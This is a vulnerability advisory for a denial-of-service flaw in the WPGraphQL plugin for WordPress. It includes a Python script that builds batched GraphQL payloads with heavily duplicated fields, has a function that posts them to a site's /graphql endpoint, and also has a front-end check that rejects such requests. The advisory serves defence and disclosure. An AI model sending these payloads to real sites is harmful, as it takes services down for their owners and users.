WPGraphQL Denial-of-Service Vulnerability

Vulnerability

A denial-of-service vulnerability has been identified in WPGraphQL, a WordPress plugin, in version 1.3.5. It allows an unauthenticated attacker to exhaust server resources by sending batched GraphQL queries in which the same field is duplicated many times. Successful exploitation leads to out-of-memory conditions on the server and to MySQL connection errors.

Impact

Exploitation causes severe resource exhaustion on the server: the PHP process handling the request runs out of memory and the site starts returning MySQL connection errors. Because the GraphQL endpoint is reachable without authentication, no credentials are needed to trigger this condition.

Reproduction

The vulnerability can be reproduced by sending POST requests to the site's WPGraphQL endpoint with payloads that amplify field duplication: a batch of GraphQL operations (a JSON array sent in one request), each of which repeats the same field many times. A short Python script that builds such batches and posts them is enough to overwhelm the server's resources.
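The payload shape described above, as an added example that is not the original reproduction script and not WPGraphQL code. It assumes WPGraphQL answers on its default /graphql path, that the site exposes the standard `posts { nodes { title } }` shape, and that the limits in the front-end check (`check_request`) are illustrative values to tune per site; the check itself is an added heuristic for a reverse proxy or WAF, not a WPGraphQL feature.

```python
"""Added example: build the batched, field-duplicated GraphQL payload
and show a front-end check that rejects it.  Not the original script
and not WPGraphQL code.  Assumptions: WPGraphQL listens on /graphql,
the site exposes `posts { nodes { title } }`, and all limits below are
illustrative values."""
import json
import re
from collections import Counter
from typing import Any, Dict, List, Optional, Tuple
from urllib import error, request

ENDPOINT_PATH = "/graphql"  # WPGraphQL default endpoint path (assumption)

# Tokens that are not field names; skipped when counting duplicates.
GRAPHQL_KEYWORDS = {"query", "mutation", "subscription", "fragment", "on",
                    "true", "false", "null"}


def amplified_query(field: str = "title", copies: int = 1000) -> str:
    """One operation that repeats `field` `copies` times in a selection set.
    Every copy has to be lexed, parsed and validated, so the server's work
    grows with `copies` even though the response carries the field once."""
    body = "\n".join(f"      {field}" for _ in range(copies))
    return "query {\n  posts {\n    nodes {\n" + body + "\n    }\n  }\n}"


def build_batch(batch_size: int, copies: int,
                field: str = "title") -> List[Dict[str, Any]]:
    """A GraphQL batch: a JSON array of operations delivered in one POST.
    Amplification per HTTP request is batch_size * copies fields."""
    return [{"query": amplified_query(field, copies)} for _ in range(batch_size)]


def payload_bytes(batch: List[Dict[str, Any]]) -> bytes:
    return json.dumps(batch).encode("utf-8")


def post_once(base_url: str, batch: List[Dict[str, Any]],
              timeout: float = 30.0) -> int:
    """POST one batch and return the HTTP status code.  Only run this
    against a WordPress instance you own or are authorised to test."""
    req = request.Request(base_url.rstrip("/") + ENDPOINT_PATH,
                          data=payload_bytes(batch),
                          headers={"Content-Type": "application/json"},
                          method="POST")
    try:
        with request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except error.HTTPError as exc:  # 4xx/5xx still carry a status
        return exc.code


def most_repeated_identifier(query: str) -> Tuple[str, int]:
    """Heuristic: the identifier that occurs most often in the document.
    A cheap proxy for field duplication that a proxy or WAF can compute
    without a full GraphQL parser; aliased copies (`a1: title`) still count."""
    names = [n for n in re.findall(r"[A-Za-z_][A-Za-z0-9_]*", query)
             if n not in GRAPHQL_KEYWORDS]
    if not names:
        return ("", 0)
    return Counter(names).most_common(1)[0]


def check_request(body: bytes, max_bytes: int = 64 * 1024, max_batch: int = 10,
                  max_duplicates: int = 50) -> Optional[str]:
    """Return None if the request is within limits, else a rejection reason.
    Meant to sit in front of WordPress so oversized batches never reach PHP."""
    if len(body) > max_bytes:
        return f"body is {len(body)} bytes, limit {max_bytes}"
    try:
        data = json.loads(body)
    except ValueError:
        return "body is not valid JSON"
    ops = data if isinstance(data, list) else [data]   # single op or batch
    if len(ops) > max_batch:
        return f"batch of {len(ops)} operations, limit {max_batch}"
    for i, op in enumerate(ops):
        if not isinstance(op, dict) or not isinstance(op.get("query"), str):
            return f"operation {i} carries no query string"
        name, count = most_repeated_identifier(op["query"])
        if count > max_duplicates:
            return f"operation {i} repeats '{name}' {count} times, limit {max_duplicates}"
    return None


if __name__ == "__main__":
    batch = build_batch(batch_size=20, copies=1000)
    print(f"{len(batch)} operations, {len(payload_bytes(batch))} bytes")
    print("front-end check says:", check_request(payload_bytes(batch)))
```

The three limits in `check_request` are deliberately independent: a small batch of huge operations trips the duplicate limit, a large batch of tiny operations trips the batch limit, and the byte limit catches anything else before JSON is even parsed. Counting identifiers with a regex is crude, but it is cheap and runs before the request reaches WordPress, which is the point when the cost you are defending against is the server's own parsing.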

Added: May 15, 2026, 7:45 PM
Updated: May 15, 2026, 7:45 PM

Vulnerability Rating

Custom Algorithm
spread: 5.2
impact: 2.5
exploitability: 9.7
remediation: 0.0
relevance: 8.4
threat: 6.4
urgency: 2.9
incentive: 8.3

Our algorithm analyzes dozens of metrics to produce these eight vulnerability categories, which are then combined into the overall risk score.